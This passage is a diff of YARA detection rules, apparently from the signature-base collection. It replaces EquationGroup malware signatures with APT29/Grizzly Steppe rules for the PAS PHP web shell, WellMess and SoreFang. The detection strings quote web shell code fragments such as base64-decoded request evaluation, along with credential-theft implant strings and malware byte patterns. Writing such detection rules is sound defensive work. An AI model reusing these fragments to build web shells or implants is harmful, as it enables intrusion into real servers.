+		reference = "https://goo.gl/WVflzO"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt29_grizzly_steppe.yar#L30-L50"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "bd25d05b001ac7d41e60270b62aeecd520a570e76557c68d78d9680c7beb90ab"
+		logic_hash = "134a76129ef2169ac60f21541ef51a223720badfad02f0822acc7fd6d49cf7e7"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "b2daf9058fdc5e2affd5a409aebb90343ddde4239331d3de8edabeafdb3a48fa"
+		hash1 = "9acba7e5f972cdd722541a23ff314ea81ac35d5c0c758eb708fb6e2cc4f598a0"
+		hash2 = "55058d3427ce932d8efcbe54dccf97c9a8d1e85c767814e34f4b2b6a6b305641"
 
 	strings:
-		$s1 = "\\\\.\\dlcndi" fullword ascii
-		$s2 = "s\\drivers\\" wide
+		$x1 = "GoogleCrashReport.dll" fullword ascii
+		$s1 = "CrashErrors" fullword ascii
+		$s2 = "CrashSend" fullword ascii
+		$s3 = "CrashAddData" fullword ascii
+		$s4 = "CrashCleanup" fullword ascii
+		$s5 = "CrashInit" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 90KB and all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and $x1 ) or ( all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Equationdrug_Gen_4 : FILE
+rule SIGNATURE_BASE_PAS_TOOL_PHP_WEB_KIT_Mod : FILE
 {
 	meta:
-		description = "EquationGroup Malware - file PC_Level4_flav_dll"
-		author = "Auto Generated"
-		id = "e3fc376b-f7cc-5dfa-bcf4-4991962a4cf9"
-		date = "2017-01-13"
+		description = "Detects PAS Tool PHP Web Kit"
+		author = "US CERT - modified by Florian Roth due to performance reasons"
+		id = "6bc75e44-7784-5e48-9bbc-052d84ebee83"
+		date = "2016-12-29"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1610-L1624"
+		reference = "https://www.us-cert.gov/security-publications/GRIZZLY-STEPPE-Russian-Malicious-Cyber-Activity"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt29_grizzly_steppe.yar#L52-L74"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3046cbfa4b4f5eb5d0efc1b2b658567391b0c219650437088a0d6c179e9235fb"
+		logic_hash = "fab894d9609c1fca4a85457e6799d082dfd3eb9ca0564abc04a1a0dd07a7b546"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "227faeb770ba538fb85692b3dfcd00f76a0a5205d1594bd0969a1e535ee90ee1"
 
 	strings:
-		$op1 = { 11 8b da 23 df 8d 1c 9e c1 fb 02 33 da 23 df 33 }
-		$op2 = { c3 0c 57 8b 3b eb 27 8b f7 83 7e 08 00 8b 3f 74 }
-		$op3 = { 00 0f b7 5e 14 8d 5c 33 18 8b c3 2b 45 08 50 ff }
+		$php = "<?php"
+		$base64decode1 = "='base'.("
+		$strreplace = "str_replace(\"\\n\", ''"
+		$md5 = ".substr(md5(strrev("
+		$gzinflate = "gzinflate"
+		$cookie = "_COOKIE"
+		$isset = "isset"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+		uint32( 0 ) == 0x68703f3c and $php at 0 and ( filesize > 10KB and filesize < 30KB ) and #cookie == 2 and #isset == 3 and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Equationdrug_Tdi6 : FILE
+rule SIGNATURE_BASE_Webshell_PHP_Web_Kit_V3 : FILE
 {
 	meta:
-		description = "EquationGroup Malware - file tdi6.sys"
+		description = "Detects PAS Tool PHP Web Kit"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c6dbc28a-ec52-5256-afff-ab15ed1b90a6"
-		date = "2017-01-13"
+		id = "dc5fa2c9-3e1e-594d-be4f-141e1f4915f1"
+		date = "2016-01-01"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1626-L1642"
+		reference = "https://github.com/wordfence/grizzly"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt29_grizzly_steppe.yar#L76-L95"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ba7e14a3bf158795ecee498976847fbbcc80635799be4574f05aa80d1a85a4ef"
+		logic_hash = "21bf0afcd3f8de813ddfe41ef32e45806e9f9d7d3b08ae7ce65017c35e32a868"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "12c082f74c0916a0e926488642236de3a12072a18d29c97bead15bb301f4b3f8"
 
 	strings:
-		$s1 = "tdi6.sys" fullword wide
-		$s3 = "TDI IPv6 Wrapper" fullword wide
-		$s5 = "Corporation. All rights reserved." fullword wide
-		$s6 = "FailAction" fullword wide
+		$php = "<?php $"
+		$php2 = "@assert(base64_decode($_REQUEST["
+		$s1 = "(str_replace(\"\\n\", '', '"
+		$s2 = "(strrev($" ascii
+		$s3 = "de'.'code';" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them )
+		(( uint32( 0 ) == 0x68703f3c and $php at 0 ) or $php2 ) and filesize > 8KB and filesize < 100KB and all of ( $s* )
 }
-rule SIGNATURE_BASE_Equationgroup_Modifyauthentication_Implant : FILE
+rule SIGNATURE_BASE_Webshell_PHP_Web_Kit_V4 : FILE
 {
 	meta:
-		description = "EquationGroup Malware - file modifyAuthentication_Implant.dll"
+		description = "Detects PAS Tool PHP Web Kit"
 		author = "Florian Roth (Nextron Systems)"
-		id = "990035c5-cd9c-59e0-b244-e2caafd2561f"
-		date = "2017-01-13"
+		id = "a5f915cd-b9c5-5cd3-b0a2-c15f6124737a"
+		date = "2016-01-01"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1644-L1661"
+		reference = "https://github.com/wordfence/grizzly"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt29_grizzly_steppe.yar#L97-L116"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8bdc4c9e9a3e327bb55781670d8f373d5a8904ccd47cc4b67673c47a76c54927"
+		logic_hash = "e2eaa0abd14f4dd08815c44797df707a08df1ea4e04ae69ba67d128a0fe4eff5"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "e1dff24af5bfc991dca21b4e3a19ffbc069176d674179eef691afc6b1ac6f805"
 
 	strings:
-		$s1 = "LSASS.EXE" fullword wide
-		$s2 = "hsamsrv.dll" fullword ascii
-		$s3 = "hZwOpenProcess" fullword ascii
-		$s4 = "hOpenProcess" fullword ascii
-		$s5 = ".?AVFeFinallyFailure@@" fullword ascii
+		$php = "<?php $"
+		$s1 = "(StR_ReplAcE(\"\\n\",'',"
+		$s2 = ";if(PHP_VERSION<'5'){" ascii
+		$s3 = "=SuBstr_rePlACe(" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
+		uint32( 0 ) == 0x68703f3c and $php at 0 and filesize > 8KB and filesize < 100KB and 2 of ( $s* )
 }
-rule SIGNATURE_BASE_Equationgroup_Ntfltmgr : FILE
+rule SIGNATURE_BASE_APT_APT29_Wellmess_Dotnet_Unique_Strings : FILE
 {
 	meta:
-		description = "EquationGroup Malware - file ntfltmgr.sys"
-		author = "Florian Roth (Nextron Systems)"
-		id = "dd7fd371-a097-5df5-9ffd-89babbadee96"
-		date = "2017-01-13"
+		description = "Rule to detect WellMess .NET samples based on unique strings and function/variable names"
+		author = "NCSC"
+		id = "7a058ec7-f795-5226-b511-ff469a969ee6"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1663-L1679"
+		reference = "https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt29_grizzly_steppe.yar#L120-L136"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3e931088f363c7dfb6057019faf9e5c674c90f6bdae6211dcc871464b410efd3"
+		hash = "2285a264ffab59ab5a1eb4e2b9bcab9baf26750b6c551ee3094af56a4442ac41"
+		logic_hash = "90e8480aa50e18202007bcffdc8348290ad0ac0588c924b4f75ea425a6cae32d"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "f7a886ee10ee6f9c6be48c20f370514be62a3fd2da828b0dff44ff3d485ff5c5"
 
 	strings:
-		$s1 = "ntfltmgr.sys" fullword wide
-		$s2 = "ntfltmgr.pdb" fullword ascii
-		$s4 = "Network Filter Manager" fullword wide
-		$s5 = "Corporation. All rights reserved." fullword wide
+		$s1 = "HealthInterval" wide
+		$s2 = "Hello from Proxy" wide
+		$s3 = "Start bot:" wide
+		$s4 = "FromNormalToBase64" ascii
+		$s5 = "FromBase64ToNormal" ascii
+		$s6 = "WellMess" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them )
+		uint16( 0 ) == 0x5a4d and uint16( uint16( 0x3c ) ) == 0x4550 and 3 of them
 }
-rule SIGNATURE_BASE_Equationgroup_DXGHLP16 : FILE
+rule SIGNATURE_BASE_APT_APT29_Sorefang_Encryption_Key_Schedule : FILE
 {
 	meta:
-		description = "EquationGroup Malware - file DXGHLP16.SYS"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d9e39c22-f606-5d9c-a5e2-e536b8566595"
-		date = "2017-01-13"
-		modified = "2023-01-06"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1681-L1702"
+		description = "Rule to detect SoreFang based on the key schedule used for encryption"
+		author = "NCSC"
+		id = "8d89edc1-a9fc-5155-9dc2-8d7f952f90d1"
+		date = "2023-12-05"
+		modified = "2023-12-05"
+		reference = "https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt29_grizzly_steppe.yar#L138-L153"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5244cef876af4c0c02109599e6250254c854ed5c9bd2d0ccc44676dca21a1650"
+		hash = "58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2"
+		logic_hash = "d4f7ec82e51f1063b4d61302e5ff9268dd3233bb44269fc32cb57fb9240f96e2"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "fcfb56fa79d2383d34c471ef439314edc2239d632a880aa2de3cea430f6b5665"
 
 	strings:
-		$s1 = "DXGHLP16.SYS" fullword wide
-		$s2 = "P16.SYS" fullword ascii
-		$s3 = "\\Registry\\User\\CurrentUser\\" wide
-		$s4 = "\\DosDevices\\%ws" wide
-		$s5 = "\\Device\\%ws_%ws" wide
-		$s6 = "ct@SYS\\DXGHLP16.dbg" fullword ascii
-		$s7 = "%ws%03d%ws%wZ" fullword wide
-		$s8 = "TCP/IP driver" fullword wide
-		$s9 = "\\Device\\%ws" wide
+		$ = { C7 05 ?? ?? ?? ?? 63 51 E1 B7 B8 ?? ?? ?? ?? 8B 48
+            FC 81 E9 47 86 C8 61 89 08 83 C0 04 3D ?? ?? ?? ??
+            7E EB 33 D2 33 C9 B8 2C 00 00 00 89 55 D4 33 F6 89
+            4D D8 33 DB 3B F8 0F 4F C7 8D 04 40 89 45 D0 83 F8
+            01 7C 4F 0F 1F 80 00 00 00 00 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
+		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and any of them
 }
-rule SIGNATURE_BASE_Equationgroup_Equationdrug_Msgkd : FILE
+rule SIGNATURE_BASE_APT_APT29_Sorefang_Encryption_Key_2B62 : FILE
 {
 	meta:
-		description = "EquationGroup Malware - file msgkd.ex_"
-		author = "Florian Roth (Nextron Systems)"
-		id = "41019119-9bf4-5a45-b74b-f75ab7738821"
-		date = "2017-01-13"
+		description = "Rule to detect SoreFang based on hardcoded encryption key"
+		author = "NCSC"
+		id = "9a7abad7-1cfa-52c8-9416-47cb80486714"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1704-L1718"
+		reference = "https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt29_grizzly_steppe.yar#L155-L167"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "60336294ef5fa0221fc6a0e8b05bb279ac0e167024568cd9efa78e678e763704"
+		hash = "58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2"
+		logic_hash = "39ad6de70883fbe0377379c3cab15962372793043ebbf4054efb7cee3aff9104"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "25eec68fc9f0d8d1b5d72c9eae7bee29035918e9dcbeab13e276dec4b2ad2a56"
 
 	strings:
-		$s1 = "KEysud" fullword ascii
-		$s2 = "XWWWPWS" fullword ascii
+		$ = "2b6233eb3e872ff78988f4a8f3f6a3ba"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and any of them
 }
-rule SIGNATURE_BASE_Equationgroup_Runaschild_Lp : FILE
+rule SIGNATURE_BASE_APT_APT29_Sorefang_Directory_Enumeration_Output_Strings : FILE
 {
 	meta:
-		description = "EquationGroup Malware - file RunAsChild_Lp.dll"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f0623c3f-3a49-5cdf-89ea-2b3273fd8324"
-		date = "2017-01-13"
+		description = "Rule to detect SoreFang based on formatted string output for directory enumeration"
+		author = "NCSC"
+		id = "e24dbda1-3d43-52a7-9249-70a648f4913e"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1720-L1735"
+		reference = "https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt29_grizzly_steppe.yar#L169-L183"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "77bea554ead64f85f4efdc49f91ea3b24d1759ae9d91718d443938ab862b0191"
+		hash = "58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2"
+		logic_hash = "8f029269f5a383737f38af04b05a16a71af5453bffe83e04ac53191eaa49d3e7"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "1097e1d562341858e241f1f67788534c0e340a2dc2e75237d57e3f473e024464"
 
 	strings:
-		$s1 = "Privilege elevation failed" fullword wide
-		$s2 = "Unable to open parent process" fullword wide
-		$s4 = "Invalid input to lpRunAsChildPPC" fullword wide
+		$ = "----------All usres directory----------"
+		$ = "----------Desktop directory----------"
+		$ = "----------Documents directory----------"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and 2 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Equationdrug_Gen_6 : FILE
+rule SIGNATURE_BASE_APT_APT29_Sorefang_Command_Elem_Cookie_Ga_Boundary_String : FILE
 {
 	meta:
-		description = "EquationGroup Malware - file PC_Level3_dll_x64"
-		author = "Florian Roth (Nextron Systems)"
-		id = "99b2fab0-1298-5d48-a78b-eb59942ecfca"
-		date = "2017-01-13"
+		description = "Rule to detect SoreFang based on scheduled task element and Cookie header/boundary strings"
+		author = "NCSC"
+		id = "3c6ffbad-9b39-5518-aa66-d76531ddb9ea"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1737-L1752"
+		reference = "https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt29_grizzly_steppe.yar#L185-L199"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5a14bd8efe2cf68beec207e5deec28fd5b9d89c506593214eccbceae3cb862a7"
+		hash = "58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2"
+		logic_hash = "65b31a12d8abb88fbb99fcc6b2707bec90e4edc35d0cf21903213eda5cacec88"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "339855618fb3ef53987b8c14a61bd4519b2616e766149e0c21cbd7cbe7a632c9"
 
 	strings:
-		$s1 = "Psxssdll.dll" fullword wide
-		$s2 = "Posix Server Dll" fullword wide
-		$s3 = "Copyright (C) Microsoft" fullword wide
+		$ = "<Command>" wide
+		$ = "Cookie:_ga="
+		$ = "------974767299852498929531610575"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and 2 of them
 }
-rule SIGNATURE_BASE_Equationgroup_PC_Level3_Http_Flav_Dll_X64 : FILE
+rule SIGNATURE_BASE_APT_APT29_Sorefang_Encryption_Round_Function : FILE
 {
 	meta:
-		description = "EquationGroup Malware - file PC_Level3_http_flav_dll_x64"
-		author = "Florian Roth (Nextron Systems)"
-		id = "93a3d47d-1dac-5621-8e69-d6d23b7628db"
-		date = "2017-01-13"
+		description = "Rule to detect SoreFang based on the encryption round function"
+		author = "NCSC"
+		id = "0be1c084-c8df-5920-a320-90364a7fb542"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1754-L1771"
+		reference = "https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt29_grizzly_steppe.yar#L201-L214"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b304cb747e609ad5de46624e2d0d005d5f8521e16f0b36cab31535709d7ab72f"
+		hash = "58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2"
+		logic_hash = "c4979b7ec31581b43b6975be5d4b1bfa5562e5fe25bbb51bb7c388550ed80ac6"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4e0209b4f5990148f5d6dee47dbc7021bf78a782b85cef4d6c8be22d698b884f"
 
 	strings:
-		$s1 = "Psxssdll.dll" fullword wide
-		$s2 = "Posix Server Dll" fullword wide
-		$s3 = ".?AVOpenSocket@@" fullword ascii
-		$s4 = "RHTTP/1.0" fullword wide
-		$s5 = "Copyright (C) Microsoft" fullword wide
+		$ = { 8A E9 8A FB 8A 5D 0F 02 C9 88 45 0F FE C1 0F BE C5 88 6D F3 8D
+            14 45 01 00 00 00 0F AF D0 0F BE C5 0F BE C9 0F AF C8 C1 FA 1B C0 E1 05 0A D1 8B 4D EC 0F BE C1 89 55 E4 8D 14 45 01 00 00 00 0F AF D0 8B C1}
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 400KB and ( all of ( $s* ) ) ) or ( all of them )
+		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and any of them
 }
-rule SIGNATURE_BASE_Equationgroup_Equationdrug_Gen_3 : FILE
+rule SIGNATURE_BASE_APT_APT29_Sorefang_Add_Random_Commas_Spaces : FILE
 {
 	meta:
-		description = "EquationGroup Malware - file mssld.dll"
-		author = "Auto Generated"
-		id = "f664ad78-1820-5434-94cc-94f98b32e654"
-		date = "2017-01-13"
+		description = "Rule to detect SoreFang based on function that adds commas and spaces"
+		author = "NCSC"
+		id = "9a89c619-6309-500f-b4dc-c8a3e8fc4417"
+		date = "2023-12-05"
+		modified = "2023-12-05"
+		reference = "https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt29_grizzly_steppe.yar#L216-L229"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
+		hash = "58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2"
+		logic_hash = "046e222aabc9e596d9536702521b4729d990e1f327ded004ca984b73a8511a83"
+		score = 75
+		quality = 85
+		tags = "FILE"
+
+	strings:
+		$ = { E8 ?? ?? ?? ?? B9 06 00 00 00 99 F7 F9 8B CE 83 FA 04 7E 09 6A
+            02 68 ?? ?? ?? ?? EB 07 6A 01 68 }
+
+	condition:
+		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and any of them
+}
+rule SIGNATURE_BASE_APT_APT29_Sorefang_Modify_Alphabet_Custom_Encode : FILE
+{
+	meta:
+		description = "Rule to detect SoreFang based on arguments passed into custom encoding algorithm function"
+		author = "NCSC"
+		id = "7c5c1be0-ccad-5c8f-a026-445994b1f279"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1773-L1787"
+		reference = "https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt29_grizzly_steppe.yar#L231-L243"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6b43280a94f1f5c62185f6b879126bcd258e9875beeb0f7ec1e3569494a60669"
+		hash = "58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2"
+		logic_hash = "f0f5bcad52b0b15dc74a51973ef2752234bd12d677c846b2f96fe569d906ea3b"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "69dcc150468f7707cc8ef618a4cea4643a817171babfba9290395ada9611c63c"
 
 	strings:
-		$op1 = { f4 65 c6 45 f5 6c c6 45 f6 33 c6 45 f7 32 c6 45 }
-		$op2 = { 36 c6 45 e6 34 c6 45 e7 50 c6 45 e8 72 c6 45 e9 }
-		$op3 = { c6 45 e8 65 c6 45 e9 70 c6 45 ea 74 c6 45 eb 5f }
+		$ = { 33 C0 8B CE 6A 36 6A 71 66 89 46 60 88 46 62 89 46 68 66 89 46
+            64 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them )
+		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and any of them
 }
-rule SIGNATURE_BASE_Equationgroup_Getadmin_Lp : FILE
+rule SIGNATURE_BASE_APT_APT29_Sorefang_Custom_Encode_Decode : FILE
 {
 	meta:
-		description = "EquationGroup Malware - file GetAdmin_Lp.dll"
-		author = "Florian Roth (Nextron Systems)"
-		id = "3bbe0553-a5a3-5207-a94e-ad978606d9a4"
-		date = "2017-01-13"
+		description = "Rule to detect SoreFang based on the custom encoding/decoding algorithm function"
+		author = "NCSC"
+		id = "4885a659-bb3a-5e33-99cc-b827931bf58f"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1789-L1802"
+		reference = "https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt29_grizzly_steppe.yar#L245-L274"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5bff3858c59b1bb44c5e24ca5f77d8e1e582224cc1caad3955d1adb0efea318a"
+		hash = "58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2"
+		logic_hash = "536147bda9603d68748010f9db260af732fe0865a601ae1104538933b19c519b"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "e1c9c9f031d902e69e42f684ae5b35a2513f7d5f8bca83dfbab10e8de6254c78"
 
 	strings:
-		$x1 = "Current user is System -- unable to join administrators group" fullword wide
+		$ = { 55 8B EC 8B D1 53 56 8B 75 08 8B DE 80 42 62 FA 8A 4A 62 66 D3
+            EB 57 3A 5A 5C 74 0F}
+		$ = { 3A 5A 5D 74 0A 3A 5A 58 74 05 3A 5A 59 75 05 FE C1 88 4A 62 8A
+            4A 62 B8 01 00 00 00}
+		$ = { 8A 46 62 84 C0 74 3E 3C 06 73 12 0F B6 C0 B9 06 00 00 00 2B C8
+            C6 46 62 06 66 D3 66 60 0F B7 4E 60}
+		$ = { 80 3C 38 0D 0F 84 93 01 00 00 C6 42 62 06 8B 56 14 83 FA 10 72
+            04 8B 06}
+		$ = { 0F BE 0C 38 8B 45 EC 0F B6 40 5B 3B C8 75 07 8B 55 EC B3 3E}
+		$ = { 0F BE 0C 38 8B 45 EC 0F B6 40 5E 3B C8 75 0B 8B 55 EC D0 EB C6
+            42 62 05}
+		$ = { 8B 55 EC 0F BE 04 38 0F B6 DB 0F B6 4A 5F 3B C1 B8 3F 00 00 00
+            0F 44 D8}
+		$ = { 8A 4A 62 66 8B 52 60 66 D3 E2 0F B6 C3 66 0B D0 8B 45 EC 66 89
+            50 60 8A 45 F3 02 C1 88 45 F3 3C 08 72 2E 04 F8 8A C8 88 45 F3
+            66 D3 EA 8B 4D 08 0F B6 C2 50 }
+		$ = { 3A 5A 5C 74 0F 3A 5A 5D 74 0A 3A 5A 58 74 05 3A 5A 59 75 05 FE
+            C1 88 4A 62 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and any of them
 }
-rule SIGNATURE_BASE_Equationgroup_Modifygroup_Lp : FILE
+rule SIGNATURE_BASE_APT_APT29_Sorefang_Remove_Chars_Comma_Space_Dot : FILE
 {
 	meta:
-		description = "EquationGroup Malware - file ModifyGroup_Lp.dll"
-		author = "Florian Roth (Nextron Systems)"
-		id = "82c9617a-3d78-525f-a507-76c87aad7c59"
-		date = "2017-01-13"
+		description = "Rule to detect SoreFang based on function that removes commas, spaces and dots"
+		author = "NCSC"
+		id = "c15779b0-6a5e-5345-94ad-95615b567f1f"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/tcSoiJ"
